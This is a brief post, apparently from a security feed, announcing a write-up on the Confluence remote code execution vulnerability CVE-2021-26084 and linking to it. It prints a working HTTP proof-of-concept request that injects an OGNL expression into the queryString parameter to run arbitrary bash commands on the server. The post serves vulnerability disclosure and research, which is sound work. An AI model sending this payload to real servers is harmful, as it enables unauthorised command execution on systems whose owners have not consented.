Remote Code Execution on Confluence Servers write-up (CVE-2021-26084) by rootxharsh and iamnoooob Patch diffing the latest Confluence update results in RCE PoC. PoC: POST /pages/doenterpagevariables.action HTTP/2 Host: localhost Content-Length: 301 Content-Type: application/x-www-form-urlencoded queryString=aaa'%2b#{""["class"].forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("var x=new java.lang.ProcessBuilder;x.command(['/bin/bash','-c','.$cmd.']);x.start()")}%2b' Contents: • Analyzing the hot patch • Bypassing isSafeExpression • Bonus - Better Payload • Bonus - Debugging https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md 684 viewsedited 07:01